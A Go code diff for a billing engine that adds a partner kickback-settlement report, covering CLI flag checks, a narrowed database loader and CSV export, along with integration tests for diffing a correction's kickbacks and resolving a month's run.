-// readCSVFile reads one exported table: its header, and one map per row under
-// it, keyed by column name so an assertion names the column it is about rather
-// than the position of it. Every row of a table holds as many fields as its
-// header, which the reader itself enforces.
+// decodeKickbacks reads the settlement document one kickbacks call printed.
+// name is what a failure calls that call. A document the type no longer decodes
+// fails here rather than at the assertion after it.
+func decodeKickbacks(t *testing.T, name, body string) kickbacksReport {
+	t.Helper()
+
+	var report kickbacksReport
+	if err := json.Unmarshal([]byte(body), &report); err != nil {
+		t.Fatalf("decoding the document of %s: %v", name, err)
+	}
+	return report
+}
+
+// readCSVFile reads one exported table off the disk and parses it.
 func readCSVFile(t *testing.T, path string) (header []string, rows []map[string]string) {
 	t.Helper()
 
@@ -1115,12 +1571,23 @@ func readCSVFile(t *testing.T, path string) (header []string, rows []map[string]
 	if err != nil {
 		t.Fatalf("reading %s: %v", path, err)
 	}
+	return parseCSV(t, path, body)
+}
+
+// parseCSV reads one table: its header, and one map per row under it, keyed by
+// column name so an assertion names the column it is about rather than the
+// position of it. Every row of a table holds as many fields as its header,
+// which the reader itself enforces. name is what a failure calls the table,
+// the file it was read from or the command that printed it.
+func parseCSV(t *testing.T, name string, body []byte) (header []string, rows []map[string]string) {
+	t.Helper()
+
 	records, err := csv.NewReader(bytes.NewReader(body)).ReadAll()
 	if err != nil {
-		t.Fatalf("parsing %s: %v", path, err)
+		t.Fatalf("parsing %s: %v", name, err)
 	}
 	if len(records) == 0 {
-		t.Fatalf("%s holds no records, want at least its header", path)
+		t.Fatalf("%s holds no records, want at least its header", name)
 	}
 
 	header = records[0]
@@ -1569,6 +2036,7 @@ func TestBadCommandLinesAreRefusedWithoutAConfiguration(t *testing.T) {
 			{"export without a run", []string{"export", "--format", "json", "--out", "./out"}, "run"},
 			{"export without a format", []string{"export", "--run", runID, "--out", "./out"}, "format"},
 			{"export without an out", []string{"export", "--run", runID, "--format", "json"}, "out"},
+			{"kickbacks without a period", []string{"kickbacks"}, "period"},
 		} {
 			t.Run(tc.name, func(t *testing.T) {
 				_, _, err := runCLI(t, tc.args...)
@@ -1592,6 +2060,18 @@ func TestBadCommandLinesAreRefusedWithoutAConfiguration(t *testing.T) {
 		for _, want := range []string{"json", "csv"} {
 			if !strings.Contains(err.Error(), want) {
 				t.Errorf("export error = %q, want it to name %q", err, want)
+			}
+		}
+	})
+
+	t.Run("kickbacks refuses a format it does not write", func(t *testing.T) {
+		_, _, err := runCLI(t, "kickbacks", "--period", "2026-03", "--format", "xml")
+		if err == nil {
+			t.Fatal("kickbacks error = nil, want the unknown format reported")
+		}
+		for _, want := range []string{"json", "csv"} {
+			if !strings.Contains(err.Error(), want) {
+				t.Errorf("kickbacks error = %q, want it to name %q", err, want)
 			}
 		}
 	})
@@ -1711,6 +2191,26 @@ func TestFlagsAreCheckedBeforeTheConfiguration(t *testing.T) {
 		}
 		if want := `--run: "not-a-uuid" is not a uuid`; !strings.Contains(err.Error(), want) {
 			t.Errorf("export error = %q, want it to contain %q", err, want)
+		}
+	})
+
+	t.Run("kickbacks refuses a period that is not a month", func(t *testing.T) {
+		_, _, err := runCLI(t, "kickbacks", "--period", "2026-3")
+		if err == nil {
+			t.Fatal("kickbacks error = nil, want the malformed period reported")
+		}
+		if want := `--period: "2026-3" is not a YYYY-MM month`; err.Error() != want {
+			t.Errorf("kickbacks error = %q, want %q", err, want)
+		}
+	})
+
+	t.Run("kickbacks refuses a run that is not a uuid", func(t *testing.T) {
+		_, _, err := runCLI(t, "kickbacks", "--period", "2026-03", "--run", "not-a-uuid")
+		if err == nil {
+			t.Fatal("kickbacks error = nil, want the malformed run id reported")
+		}
+		if want := `--run: "not-a-uuid" is not a uuid`; !strings.Contains(err.Error(), want) {
+			t.Errorf("kickbacks error = %q, want it to contain %q", err, want)
 		}
 	})
 }

--- a/internal/engine/export/csv.go
+++ b/internal/engine/export/csv.go
@@ -12,8 +12,9 @@ import (
 	"github.com/b42labs/tally/internal/engine/runs"
 )
 
-// The two files a CSV export writes. rated.csv is every run's, deltas.csv only
-// a correction's.
+// The two files a CSV export writes off the rating. rated.csv is every run's,
+// deltas.csv only a correction's. kickbacks.csv, every run's as well, is named
+// in kickbacks.go beside the renderer that fills it.
 const (
 	ratedFileName  = "rated.csv"
 	deltasFileName = "deltas.csv"
@@ -37,24 +38,25 @@ var (
 )
 
 // CSVFiles writes a run as CSV files into a directory: rated.csv, one row per
-// rated record, and, for a correction run, deltas.csv, one row per delta. It is
-// the BillingExporter an ERP that imports tables rather than documents is fed
-// from.
+// rated record, kickbacks.csv, one row per kickback the run settles for a
+// partner, and, for a correction run, deltas.csv, one row per delta. It is the
+// BillingExporter an ERP that imports tables rather than documents is fed from.
 type CSVFiles struct {
 	// Dir is where the files are written. It is created, with every parent it
 	// needs, when the export has rendered everything.
 	Dir string
 }
 
-// Export writes the run's tables into Dir. Both files are rendered before the
+// Export writes the run's tables into Dir. Every file is rendered before the
 // directory is touched, the way the JSON writer renders before it writes, and a
 // write that fails takes the table before it with it: a correction that left
 // rated.csv in place without deltas.csv beside it is one an ERP imports the
 // debits of while the credits it owes back are nowhere.
 //
-// A run with no rated records writes rated.csv holding its header alone, and a
-// correction with no deltas writes deltas.csv holding its header alone: an
-// empty table says the run billed nothing, and a missing file says nothing at
+// A run with no rated records writes rated.csv holding its header alone, a
+// correction with no deltas writes deltas.csv holding its header alone, and a
+// run that owes no partner writes kickbacks.csv holding its header alone: an
+// empty table says the run produced no rows, and a missing file says nothing at
 // all.
 //
 // The context is not read, for the reason JSONFiles.Export gives.
@@ -71,6 +73,11 @@ func (c CSVFiles) Export(_ context.Context, run Run) error {
 		}
 	}
 
+	kickbacks, err := KickbacksCSV(run)
+	if err != nil {
+		return err
+	}
+
 	if err := prepareDir(c.Dir); err != nil {
 		return err
 	}
@@ -78,6 +85,7 @@ func (c CSVFiles) Export(_ context.Context, run Run) error {
 	if correction {
 		files = append(files, artifact{name: deltasFileName, body: deltas})
 	}
+	files = append(files, artifact{name: kickbacksCSVFileName, body: kickbacks})
 	return writeFiles(c.Dir, files)
 }
 

--- a/internal/engine/export/export.go
+++ b/internal/engine/export/export.go
@@ -5,6 +5,8 @@
 // the kickback differences to the run it corrects, all out of one snapshot. The
 // JSON and the CSV file writers are the first implementations of the interface,
 // and an ERP adapter is another one rather than a change to the loader.
+// LoadKickbacks is that read narrowed to the partner settlement, for the report
+// that renders nothing else.
 //
 // The package writes nothing to the database, and only a completed or a
 // finalized run is loaded at all: the superseded, failed and running rows a
@@ -153,6 +155,25 @@ type BillingExporter interface {
 // naming the row that carries them: an export short of a value, or holding a
 // zero where a number was meant, is one nobody can tell from a correct one.
 func Load(ctx context.Context, pool *pgxpool.Pool, runID uuid.UUID) (Run, error) {
+	return load(ctx, pool, runID, true)
+}
+
+// LoadKickbacks reads one run and what it settles for its partners, under the
+// snapshot and with the refusals Load applies, and without the statements, the
+// rated records and a correction's deltas only a full export renders: two
+// queries for a regular run and three for a correction. The settlement report
+// renders none of the three, and a month of rated records is tens of thousands
+// of rows, each with a usage object to decode, so reading them would hold the
+// snapshot and its pooled connection for a decode nothing is rendered from.
+func LoadKickbacks(ctx context.Context, pool *pgxpool.Pool, runID uuid.UUID) (Run, error) {
+	return load(ctx, pool, runID, false)
+}
+
+// load is the read the two share. artifacts says whether the statements, the
+// rated records and a correction's deltas are read on top of the run row and
+// the kickbacks, which is what separates a full export from the settlement
+// report.
+func load(ctx context.Context, pool *pgxpool.Pool, runID uuid.UUID, artifacts bool) (Run, error) {
 	tx, err := pool.BeginTx(ctx, pgx.TxOptions{IsoLevel: pgx.RepeatableRead, AccessMode: pgx.ReadOnly})
 	if err != nil {
 		return Run{}, fmt.Errorf("reading the run %s: %w", runID, err)
@@ -205,15 +226,17 @@ func Load(ctx context.Context, pool *pgxpool.Pool, runID uuid.UUID) (Run, error)
 		run.Clouds = []string{}
 	}
 
-	if run.Statements, err = loadStatements(ctx, q, id, runID); err != nil {
-		return Run{}, err
-	}
-	if run.Rated, err = loadRated(ctx, q, id, runID); err != nil {
-		return Run{}, err
-	}
-	if run.Kind == runs.KindCorrection {
-		if run.Deltas, err = loadDeltas(ctx, q, id, runID); err != nil {
+	if artifacts {
+		if run.Statements, err = loadStatements(ctx, q, id, runID); err != nil {
 			return Run{}, err
+		}
+		if run.Rated, err = loadRated(ctx, q, id, runID); err != nil {
+			return Run{}, err
+		}
+		if run.Kind == runs.KindCorrection {
+			if run.Deltas, err = loadDeltas(ctx, q, id, runID); err != nil {
+				return Run{}, err
+			}
 		}
 	}
 	if run.Kickbacks, err = loadKickbacks(ctx, q, run); err != nil {

--- a/internal/engine/export/export.go
+++ b/internal/engine/export/export.go
@@ -21,7 +21,9 @@
 // second export replaces the first one file by file.
 //
 // The normative specification is roadmap/03-phase-3-metering-rating.md, WP
-// 3.10.
+// 3.10, and, for the partner settlement the writers put beside the statements
+// as kickbacks.json or kickbacks.csv, roadmap/05-phase-5-commercial-pricing.md,
+// WP 5.4.
 package export
 
 import (

--- a/internal/engine/export/export.go
+++ b/internal/engine/export/export.go
@@ -1,9 +1,10 @@
 // Package export reads one run back out of the engine database and hands it to
 // a BillingExporter, which is the seam every consumer of billing artifacts sits
-// behind. Load is the read: one run row, its statements, its rated records and,
-// for a correction, its deltas, all out of one snapshot. The JSON and the CSV
-// file writers are the first implementations of the interface, and an ERP
-// adapter is another one rather than a change to the loader.
+// behind. Load is the read: one run row, its statements, its rated records, the
+// kickbacks it settles for its partners and, for a correction, its deltas and
+// the kickback differences to the run it corrects, all out of one snapshot. The
+// JSON and the CSV file writers are the first implementations of the interface,
+// and an ERP adapter is another one rather than a change to the loader.
 //
 // The package writes nothing to the database, and only a completed or a
 // finalized run is loaded at all: the superseded, failed and running rows a
@@ -56,8 +57,9 @@ const (
 )
 
 // Run is one run as an exporter receives it: its row, its statements, its rated
-// records, and, for a correction, its deltas. It is everything the file writers
-// below need, so an exporter runs with no database handle of its own.
+// records, the kickbacks it settles, and, for a correction, its deltas. It is
+// everything the file writers below need, so an exporter runs with no database
+// handle of its own.
 type Run struct {
 	ID uuid.UUID
 	// Kind is runs.KindRegular or runs.KindCorrection.
@@ -90,6 +92,11 @@ type Run struct {
 	// Deltas holds one entry per correction delta, in the order corrections.Diff
 	// sorted them. It is empty for a regular run, which has none.
 	Deltas []Delta
+	// Kickbacks holds what the run settles for its partners, in the order
+	// sortKickbacks defines: beneficiary, currency, statement key, relation,
+	// scope, rate, amount, base. A correction's are the differences to the run
+	// it corrects, and a run that owes nobody carries none.
+	Kickbacks []Kickback
 }
 
 // RatedRecord is one rated_records row with the usage record it rates: what was
@@ -127,12 +134,16 @@ type BillingExporter interface {
 	Export(ctx context.Context, run Run) error
 }
 
-// Load reads one run and everything an exporter renders from it. The four
-// queries run in one REPEATABLE READ transaction, so the statements, the rated
-// records and the deltas an exporter receives are the ones that belonged to the
-// run at one instant rather than four. The transaction is read-only as defense
-// in depth, and it is ended by the rollback below: an export writes nothing
-// there is anything to commit.
+// Load reads one run and everything an exporter renders from it. Four queries
+// run for a regular run (the run row, its statements, its rated records and its
+// adjustment records) and six for a correction (its deltas and the adjustment
+// records of the run it corrects on top), all in one REPEATABLE READ
+// transaction, so what an exporter receives is what belonged to the run at one
+// instant rather than at four or six. A correction's kickbacks are diffed
+// against the corrected run's inside that same snapshot, so the two sides of a
+// difference come from one state of the database. The transaction is read-only
+// as defense in depth, and it is ended by the rollback below: an export writes
+// nothing there is anything to commit.
 //
 // A run id no row carries is refused with runs.ErrRunNotFound, and a run that
 // is neither completed nor finalized with ErrRunNotExportable. A stored amount
@@ -202,6 +213,9 @@ func Load(ctx context.Context, pool *pgxpool.Pool, runID uuid.UUID) (Run, error)
 		if run.Deltas, err = loadDeltas(ctx, q, id, runID); err != nil {
 			return Run{}, err
 		}
+	}
+	if run.Kickbacks, err = loadKickbacks(ctx, q, run); err != nil {
+		return Run{}, err
 	}
 	return run, nil
 }

--- a/internal/engine/export/export_integration_test.go
+++ b/internal/engine/export/export_integration_test.go
@@ -23,6 +23,7 @@ import (
 
 	"github.com/b42labs/tally/internal/engine/export"
 	"github.com/b42labs/tally/internal/engine/runs"
+	"github.com/b42labs/tally/internal/engine/store"
 	"github.com/b42labs/tally/internal/engine/store/storetest"
 )
 
@@ -239,6 +240,47 @@ func seedAdjustmentRecord(t *testing.T, db storetest.DB, runID, relationID uuid.
 		numeric(t, rate), numeric(t, base), numeric(t, amount), currency); err != nil {
 		t.Fatalf("seeding the %s adjustment of %s: %v", typ, projectKey, err)
 	}
+}
+
+// seedBillingPeriod writes the March 2026 period a run is resolved through. A
+// finalized period names the run that closed it and when that happened, and a
+// period of every other status names neither, which is the pairing the CHECK of
+// migration 0001 admits.
+func seedBillingPeriod(t *testing.T, db storetest.DB, status string, finalizedRunID uuid.UUID) {
+	t.Helper()
+
+	var closedBy *uuid.UUID
+	var finalizedAt *time.Time
+	if status == "finalized" {
+		closedBy, finalizedAt = &finalizedRunID, &runCompletedAt
+	}
+
+	if _, err := db.Store.Pool().Exec(t.Context(),
+		`INSERT INTO billing_periods (period_from, period_to, status, finalized_run_id, finalized_at)
+		 VALUES ($1, $2, $3, $4, $5)`,
+		periodFrom, periodTo, status, closedBy, finalizedAt); err != nil {
+		t.Fatalf("seeding the %s billing period: %v", status, err)
+	}
+}
+
+// siblingDB is a migrated database of its own beside the test's, on the same
+// container. period_from is the primary key of billing_periods, and the query
+// behind a resolution reads every completed run of the month, so two cases over
+// one database would resolve against each other's seeds: every subtest of
+// TestPeriodRun owns a March of its own.
+func siblingDB(t *testing.T, db storetest.DB, name string) storetest.DB {
+	t.Helper()
+
+	url := db.NewSiblingDB(t, name)
+	if _, err := store.Migrate(t.Context(), url); err != nil {
+		t.Fatalf("migrating the database %s: %v", name, err)
+	}
+	s, err := store.New(t.Context(), url)
+	if err != nil {
+		t.Fatalf("opening the pool on the database %s: %v", name, err)
+	}
+	t.Cleanup(s.Close)
+	return storetest.DB{Store: s, URL: url, Container: db.Container}
 }
 
 // numeric is an amount on its way into a NUMERIC(14,2) column. It reaches the
@@ -950,5 +992,99 @@ func TestLoadRefusals(t *testing.T) {
 			t.Fatalf("Load() error = nil, want the unreachable database reported")
 		}
 		assertMessage(t, err, "reading the run "+runID.String()+":")
+	})
+}
+
+// TestPeriodRun pins which run a month alone reports from. What a partner is
+// settled for a month is what the regular run of that month settled: the run
+// that closed the month once it is finalized, and the completed regular run
+// while the month is still open. A finalized correction beside that run is
+// never what the month resolves to, because a correction settles the
+// differences on top of the payout the partner already received, and a caller
+// after those differences names the correction with --run.
+func TestPeriodRun(t *testing.T) {
+	db := storetest.NewDB(t)
+
+	t.Run("a finalized month resolves to the run that closed it", func(t *testing.T) {
+		sibling := siblingDB(t, db, "finalized_month")
+		regular := seedRun(t, sibling, runSeed{
+			kind:           runs.KindRegular,
+			status:         "finalized",
+			pricingVersion: pricingVersion,
+			completedAt:    runCompletedAt,
+		})
+		// The correction is finalized too, and the period keeps naming the regular
+		// run: a resolution that took the latest finalized run of the month would
+		// report the differences as the month's settlement.
+		seedRun(t, sibling, runSeed{
+			kind:           runs.KindCorrection,
+			status:         "finalized",
+			correctsRunID:  regular,
+			pricingVersion: pricingVersion,
+			completedAt:    runCompletedAt,
+		})
+		seedBillingPeriod(t, sibling, "finalized", regular)
+
+		got, err := export.PeriodRun(t.Context(), sibling.Store.Pool(), periodFrom)
+		if err != nil {
+			t.Fatalf("PeriodRun() error = %v, want nil", err)
+		}
+		if got != regular {
+			t.Errorf("the month resolves to %s, want the regular run %s that closed it", got, regular)
+		}
+	})
+
+	t.Run("an open month resolves to its completed regular run", func(t *testing.T) {
+		sibling := siblingDB(t, db, "open_month")
+		regular := seedCompletedRun(t, sibling)
+		seedCorrectionRun(t, sibling, regular)
+		seedBillingPeriod(t, sibling, "grace", uuid.Nil)
+
+		got, err := export.PeriodRun(t.Context(), sibling.Store.Pool(), periodFrom)
+		if err != nil {
+			t.Fatalf("PeriodRun() error = %v, want nil", err)
+		}
+		if got != regular {
+			t.Errorf("the month resolves to %s, want the regular run %s", got, regular)
+		}
+	})
+
+	t.Run("a month whose runs all failed or were superseded", func(t *testing.T) {
+		sibling := siblingDB(t, db, "no_completed_run")
+		seedRun(t, sibling, runSeed{kind: runs.KindRegular, status: "superseded"})
+		seedRun(t, sibling, runSeed{kind: runs.KindRegular, status: "failed"})
+		seedBillingPeriod(t, sibling, "grace", uuid.Nil)
+
+		_, err := export.PeriodRun(t.Context(), sibling.Store.Pool(), periodFrom)
+		if !errors.Is(err, export.ErrNoRunForPeriod) {
+			t.Fatalf("PeriodRun() error = %v, want one matching ErrNoRunForPeriod", err)
+		}
+		assertMessage(t, err, "has no completed run", "tally-engine run --period 2026-03")
+	})
+
+	t.Run("a month without a billing period", func(t *testing.T) {
+		sibling := siblingDB(t, db, "no_billing_period")
+
+		_, err := export.PeriodRun(t.Context(), sibling.Store.Pool(), periodFrom)
+		if !errors.Is(err, export.ErrNoRunForPeriod) {
+			t.Fatalf("PeriodRun() error = %v, want one matching ErrNoRunForPeriod", err)
+		}
+		assertMessage(t, err, "has no billing period", "tally-engine run --period 2026-03")
+	})
+
+	t.Run("a database that cannot be reached", func(t *testing.T) {
+		// The pool opens no connection until one is asked for, so the address
+		// nothing listens on is reported by the snapshot the two reads share
+		// rather than here, and the case needs no database of its own.
+		unreachable, err := pgxpool.New(t.Context(), "postgres://nobody@127.0.0.1:1/none")
+		if err != nil {
+			t.Fatalf("opening the pool on an unreachable database: %v", err)
+		}
+		defer unreachable.Close()
+
+		if _, err = export.PeriodRun(t.Context(), unreachable, periodFrom); err == nil {
+			t.Fatalf("PeriodRun() error = nil, want the unreachable database reported")
+		}
+		assertMessage(t, err, "reading the run of 2026-03:")
 	})
 }

--- a/internal/engine/export/export_integration_test.go
+++ b/internal/engine/export/export_integration_test.go
@@ -104,6 +104,20 @@ func seedCompletedRun(t *testing.T, db storetest.DB) uuid.UUID {
 	})
 }
 
+// seedCorrectionRun writes a completed correction of one run, which is the
+// second half of every pair a kickback difference is read from.
+func seedCorrectionRun(t *testing.T, db storetest.DB, corrected uuid.UUID) uuid.UUID {
+	t.Helper()
+
+	return seedRun(t, db, runSeed{
+		kind:           runs.KindCorrection,
+		status:         "completed",
+		correctsRunID:  corrected,
+		pricingVersion: pricingVersion,
+		completedAt:    runCompletedAt,
+	})
+}
+
 // finalizeRun closes a seeded run. The records of a finalized run cannot be
 // written, so a case that needs one seeds its rows under the completed run and
 // moves the status afterwards, which is the transition trg_runs_immutable
@@ -202,6 +216,28 @@ func seedDelta(t *testing.T, db storetest.DB, runID, correctsRunID uuid.UUID, se
 		numeric(t, seed.old), numeric(t, seed.current), numeric(t, seed.difference),
 		currency); err != nil {
 		t.Fatalf("seeding the %s delta of %s: %v", seed.dimension, seed.resourceID, err)
+	}
+}
+
+// seedAdjustmentRecord writes one applied adjustment under a run. The insert is
+// plain SQL for the reason seedDelta's is: what a case asserts is the read, so
+// it is not also what sets it up. An empty beneficiary reaches the column as the
+// NULL every type but kickback carries, which is the pairing the CHECK of
+// migration 0002 admits.
+func seedAdjustmentRecord(t *testing.T, db storetest.DB, runID, relationID uuid.UUID,
+	projectKey, beneficiary, typ, scope, rate, base, amount string,
+) {
+	t.Helper()
+
+	if _, err := db.Store.Pool().Exec(t.Context(),
+		`INSERT INTO adjustment_records (run_id, project_id, relation_id, relation_type,
+		                                 relation_target, beneficiary, type, scope,
+		                                 rate, base, amount, currency)
+		 VALUES ($1, $2, $3, 'managed_by', 'partner-corp', NULLIF($4::text, ''),
+		         $5, $6, $7, $8, $9, $10)`,
+		runID, projectKey, relationID, beneficiary, typ, scope,
+		numeric(t, rate), numeric(t, base), numeric(t, amount), currency); err != nil {
+		t.Fatalf("seeding the %s adjustment of %s: %v", typ, projectKey, err)
 	}
 }
 
@@ -377,6 +413,12 @@ func TestLoadReadsARunWhole(t *testing.T) {
 			t.Errorf("the run carries the deltas %v, want none: a regular run corrects nothing", run.Deltas)
 		}
 	})
+
+	t.Run("reads no kickbacks for a run that applied no adjustments", func(t *testing.T) {
+		if len(run.Kickbacks) != 0 {
+			t.Errorf("the run carries the kickbacks %v, want none: it settles nobody", run.Kickbacks)
+		}
+	})
 }
 
 // TestLoadReadsARunThatCarriesNothing pins the two runs an export is short of a
@@ -397,6 +439,9 @@ func TestLoadReadsARunThatCarriesNothing(t *testing.T) {
 		}
 		if len(run.Deltas) != 0 {
 			t.Errorf("the run carries the deltas %v, want none", run.Deltas)
+		}
+		if len(run.Kickbacks) != 0 {
+			t.Errorf("the run carries the kickbacks %v, want none", run.Kickbacks)
 		}
 	})
 
@@ -523,6 +568,9 @@ func TestLoadReadsTheDeltasOfACorrection(t *testing.T) {
 	if run.CorrectsRunID != corrected {
 		t.Errorf("the run corrects %s, want %s", run.CorrectsRunID, corrected)
 	}
+	if len(run.Kickbacks) != 0 {
+		t.Errorf("the run carries the kickbacks %v, want none: neither pass settled a partner", run.Kickbacks)
+	}
 
 	type row struct {
 		cloud, platform, resourceType, resourceID, projectID, dimension string
@@ -559,6 +607,125 @@ func TestLoadReadsTheDeltasOfACorrection(t *testing.T) {
 	if !reflect.DeepEqual(got, want) {
 		t.Errorf("the deltas are %v, want %v", got, want)
 	}
+}
+
+// TestLoadReadsTheKickbacksOfARun pins what a run hands a settlement: its
+// kickback records, and nothing else it adjusted. The rows are written in none
+// of the order the case asserts, and a discount sits among them: a discount is
+// what a project was billed rather than what a partner is paid, and a payout it
+// leaked into is money nobody owes.
+func TestLoadReadsTheKickbacksOfARun(t *testing.T) {
+	db := storetest.NewDB(t)
+	runID := seedCompletedRun(t, db)
+
+	seedAdjustmentRecord(t, db, runID, relation5, statementKey, "",
+		"discount", "all", "0.150000", "600.00", "-90.00")
+	seedAdjustmentRecord(t, db, runID, relation4, statementKey, "partner-two",
+		"kickback", "all", "0.020000", "500.00", "10.00")
+	seedAdjustmentRecord(t, db, runID, relation2, statementKey, "partner-corp",
+		"kickback", "all", "0.100000", "500.00", "50.00")
+	seedAdjustmentRecord(t, db, runID, relation3, "os-dr/proj-456", "partner-corp",
+		"kickback", "openstack.instance", "0.050000", "200.00", "10.00")
+	seedAdjustmentRecord(t, db, runID, relation1, "os-prod/proj-123", "partner-corp",
+		"kickback", "all", "0.100000", "1020.00", "102.00")
+
+	got := kickbackRows(load(t, db, runID).Kickbacks)
+	want := kickbackRows([]export.Kickback{
+		kickback("partner-corp", "os-dr", projectID, relation3, "openstack.instance",
+			"0.050000", "200.00", "10.00"),
+		kickback("partner-corp", "os-prod", "proj-123", relation1, "all", "0.100000", "1020.00", "102.00"),
+		kickback("partner-corp", "os-prod", projectID, relation2, "all", "0.100000", "500.00", "50.00"),
+		kickback("partner-two", "os-prod", projectID, relation4, "all", "0.020000", "500.00", "10.00"),
+	})
+	if !reflect.DeepEqual(got, want) {
+		t.Errorf("the kickbacks are %v, want %v", got, want)
+	}
+
+	t.Run("a run without kickbacks", func(t *testing.T) {
+		discounted := seedCompletedRun(t, db)
+		seedAdjustmentRecord(t, db, discounted, relation5, statementKey, "",
+			"discount", "all", "0.150000", "600.00", "-90.00")
+
+		for _, id := range []uuid.UUID{discounted, seedCompletedRun(t, db)} {
+			if got := load(t, db, id).Kickbacks; len(got) != 0 {
+				t.Errorf("the run %s carries the kickbacks %v, want none", id, got)
+			}
+		}
+	})
+}
+
+// TestLoadDiffsTheKickbacksOfACorrection pins what a correction settles for a
+// partner. The partner was paid on the finalized month already, so what the
+// correction owes is the difference to what that run settled: a kickback the
+// correction re-rated smaller is money owed back, one it dropped is taken back
+// whole, and one it settles for the first time is owed whole.
+func TestLoadDiffsTheKickbacksOfACorrection(t *testing.T) {
+	db := storetest.NewDB(t)
+
+	corrected := seedCompletedRun(t, db)
+	seedAdjustmentRecord(t, db, corrected, relation1, statementKey, "partner-corp",
+		"kickback", "all", "0.100000", "126.48", "12.65")
+	seedAdjustmentRecord(t, db, corrected, relation2, statementKey, "partner-corp",
+		"kickback", "all", "0.100000", "50.00", "5.00")
+	// The month is closed after its rows are written: the records of a finalized
+	// run are immutable, and the trigger refuses an insert under one.
+	finalizeRun(t, db, corrected)
+
+	correction := seedCorrectionRun(t, db, corrected)
+	seedAdjustmentRecord(t, db, correction, relation1, statementKey, "partner-corp",
+		"kickback", "all", "0.100000", "106.08", "10.61")
+	seedAdjustmentRecord(t, db, correction, relation3, statementKey, "partner-corp",
+		"kickback", "all", "0.100000", "30.00", "3.00")
+
+	got := kickbackRows(load(t, db, correction).Kickbacks)
+	want := kickbackRows([]export.Kickback{
+		kickback("partner-corp", "os-prod", projectID, relation1, "all", "0.100000", "-20.40", "-2.04"),
+		kickback("partner-corp", "os-prod", projectID, relation2, "all", "0.100000", "-50.00", "-5.00"),
+		kickback("partner-corp", "os-prod", projectID, relation3, "all", "0.100000", "30.00", "3.00"),
+	})
+	if !reflect.DeepEqual(got, want) {
+		t.Errorf("the kickbacks are %v, want %v", got, want)
+	}
+
+	t.Run("a corrected run that settled nobody", func(t *testing.T) {
+		correction := seedCorrectionRun(t, db, seedCompletedRun(t, db))
+		seedAdjustmentRecord(t, db, correction, relation1, statementKey, "partner-corp",
+			"kickback", "all", "0.100000", "106.08", "10.61")
+
+		got := kickbackRows(load(t, db, correction).Kickbacks)
+		want := kickbackRows([]export.Kickback{
+			kickback("partner-corp", "os-prod", projectID, relation1, "all", "0.100000", "106.08", "10.61"),
+		})
+		if !reflect.DeepEqual(got, want) {
+			t.Errorf("the kickbacks are %v, want %v", got, want)
+		}
+	})
+
+	t.Run("a correction that settles what the corrected run settled", func(t *testing.T) {
+		corrected := seedCompletedRun(t, db)
+		seedAdjustmentRecord(t, db, corrected, relation1, statementKey, "partner-corp",
+			"kickback", "all", "0.100000", "126.48", "12.65")
+		correction := seedCorrectionRun(t, db, corrected)
+		seedAdjustmentRecord(t, db, correction, relation1, statementKey, "partner-corp",
+			"kickback", "all", "0.100000", "126.48", "12.65")
+
+		if got := load(t, db, correction).Kickbacks; len(got) != 0 {
+			t.Errorf("the correction carries the kickbacks %v, want none: the partner was paid already", got)
+		}
+	})
+
+	t.Run("a base that moved under an amount that did not", func(t *testing.T) {
+		corrected := seedCompletedRun(t, db)
+		seedAdjustmentRecord(t, db, corrected, relation1, statementKey, "partner-corp",
+			"kickback", "all", "0.100000", "100.00", "10.00")
+		correction := seedCorrectionRun(t, db, corrected)
+		seedAdjustmentRecord(t, db, correction, relation1, statementKey, "partner-corp",
+			"kickback", "all", "0.100000", "100.04", "10.00")
+
+		if got := load(t, db, correction).Kickbacks; len(got) != 0 {
+			t.Errorf("the correction carries the kickbacks %v, want none: the credit note drops it too", got)
+		}
+	})
 }
 
 // TestLoadCarriesAStoredDocumentThroughJSONB pins the round trip a statement
@@ -666,6 +833,69 @@ func TestLoadRefusals(t *testing.T) {
 			t.Fatalf("Load() error = nil, want the stored non-number refused")
 		}
 		assertMessage(t, err, instance.ResourceID, projectID, "vcpus")
+	})
+
+	t.Run("a kickback amount that is not a number", func(t *testing.T) {
+		runID := seedCompletedRun(t, db)
+		seedAdjustmentRecord(t, db, runID, relation1, statementKey, "partner-corp",
+			"kickback", "all", "0.100000", "500.00", "NaN")
+
+		_, err := export.Load(t.Context(), pool, runID)
+		if err == nil {
+			t.Fatalf("Load() error = nil, want the stored non-number refused")
+		}
+		assertMessage(t, err, "the kickback of relation", relation1.String(), statementKey, "is not a number")
+	})
+
+	t.Run("a kickback base that is not a number", func(t *testing.T) {
+		runID := seedCompletedRun(t, db)
+		seedAdjustmentRecord(t, db, runID, relation2, statementKey, "partner-corp",
+			"kickback", "all", "0.100000", "NaN", "50.00")
+
+		_, err := export.Load(t.Context(), pool, runID)
+		if err == nil {
+			t.Fatalf("Load() error = nil, want the stored non-number refused")
+		}
+		assertMessage(t, err, "the kickback of relation", relation2.String(), statementKey, "is not a number")
+	})
+
+	t.Run("a corrected run whose kickback is not a number", func(t *testing.T) {
+		corrected := seedCompletedRun(t, db)
+		seedAdjustmentRecord(t, db, corrected, relation3, statementKey, "partner-corp",
+			"kickback", "all", "0.100000", "500.00", "NaN")
+		correction := seedCorrectionRun(t, db, corrected)
+		seedAdjustmentRecord(t, db, correction, relation3, statementKey, "partner-corp",
+			"kickback", "all", "0.100000", "400.00", "40.00")
+
+		// The difference is taken between two runs, so the side that carries the
+		// stored non-number is the one the refusal names.
+		_, err := export.Load(t.Context(), pool, correction)
+		if err == nil {
+			t.Fatalf("Load() error = nil, want the stored non-number refused")
+		}
+		assertMessage(t, err, "the kickback of relation", corrected.String(), "is not a number")
+	})
+
+	t.Run("a correction that names no corrected run", func(t *testing.T) {
+		// runs.corrects_run_id carries no CHECK tying it to the correction kind,
+		// so this row is one the schema admits. Its kickbacks are the differences
+		// to a run, and the empty baseline the nil uuid reads back would report
+		// the correction's whole month as differences the partner is owed a
+		// second time, under a document that says nothing is missing.
+		correction := seedRun(t, db, runSeed{
+			kind:           runs.KindCorrection,
+			status:         "completed",
+			pricingVersion: pricingVersion,
+			completedAt:    runCompletedAt,
+		})
+		seedAdjustmentRecord(t, db, correction, relation4, statementKey, "partner-corp",
+			"kickback", "all", "0.100000", "500.00", "50.00")
+
+		_, err := export.Load(t.Context(), pool, correction)
+		if err == nil {
+			t.Fatalf("Load() error = nil, want the correction without a corrected run refused")
+		}
+		assertMessage(t, err, correction.String(), "names no corrected run")
 	})
 
 	t.Run("a statement total that is not a number", func(t *testing.T) {

--- a/internal/engine/export/export_integration_test.go
+++ b/internal/engine/export/export_integration_test.go
@@ -770,6 +770,77 @@ func TestLoadDiffsTheKickbacksOfACorrection(t *testing.T) {
 	})
 }
 
+// TestLoadKickbacksReadsTheSettlementAlone pins what the settlement report
